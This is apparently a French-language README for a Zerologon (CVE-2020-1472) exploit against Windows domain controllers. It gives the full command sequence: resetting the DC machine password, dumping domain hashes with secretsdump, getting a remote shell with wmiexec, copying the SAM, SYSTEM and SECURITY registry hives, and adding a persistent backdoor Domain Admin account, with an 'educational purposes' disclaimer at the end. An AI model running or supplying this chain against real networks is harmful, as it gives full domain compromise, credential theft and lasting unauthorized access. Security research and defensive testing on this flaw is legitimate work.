
zerologon script to exploit CVE-2020-1472 CVSS 10/10
zerologon script pour exploiter CVE-2020-1472 CVSS 10/10 Code d'exploitation basé sur https://www.secura.com/blog/zero-logon et https://github.com/SecuraBV/CVE-2020-1472. Recherche originale et scanner par Secura, modifications par RiskSense Inc. https://github.com/risksense/zerologon
Pour exploiter, supprimez toutes les installations précédentes d'Impacket et installez Impacket depuis https://github.com/SecureAuthCorp/impacket/commit/b867b21 ou plus récent.
apt update
apt remove --purge impacket-scripts python3-impacket
apt autoremove
git clone https://github.com/rthalley/dnspython.git
sudo python3 setup.py install
cd ..
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
git clone
Ensuite, faites :
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
Si cela réussit, vous pourrez alors :
sudo secretsdump.py -just-dc domain/hostname\$@ip
Appuyer sur 'Entrée' à l'invite de mot de passe vous permettra de passer, ce qui devrait vous donner le hash de l'administrateur de domaine. Après avoir cela, utilisez wmiexec.py sur le DC cible avec un identifiant issu de secretsdump
wmiexec.py domain/Administrator@ip -hashes hash
et faites
reg save HKLM\SYSTEM system.save
get system.save
del /f system.save
reg save HKLM\SAM sam.save
get sam.save
del /f sam.save
reg save HKLM\SECURITY security.save
get security.save
del /f security.save
Et ensuite vous pouvez créer un nouveau compte administrateur au cas où,
net user myadmin Hello1234 /ADD /DOMAIN
et ajoutez le nouveau compte au groupe des administrateurs de domaine pour obtenir tous les privilèges,
net group "Domain Admins" myadmin /ADD /DOMAIN
et probablement exit maintenant depuis C:>
Ensuite vous pouvez exécuter
sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Et cela devrait vous montrer le hash NT d'origine du compte machine. Vous pouvez alors réinstaller ce hash de compte machine d'origine dans le domaine en exécutant
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
Réinstaller le hash d'origine est nécessaire pour que le DC continue de fonctionner normalement.
Et juste pour vérifier si le processus de restauration a fonctionné,
sudo secretsdump.py -just-dc domain/hostname\$@ip
et appuyer sur 'Entrée' à l'invite de mot de passe ne fonctionnera plus.
Et voilà, nous avons terminé.
Bonne chasse.
AVERTISSEMENT : Ceci est purement à des fins éducatives, je ne serai pas tenu responsable des actions ou de leurs conséquences PIRATER L'APPAREIL DE QUELQU'UN D'AUTRE EST ILLÉGAL ET EST PUNI PAR LA LOI.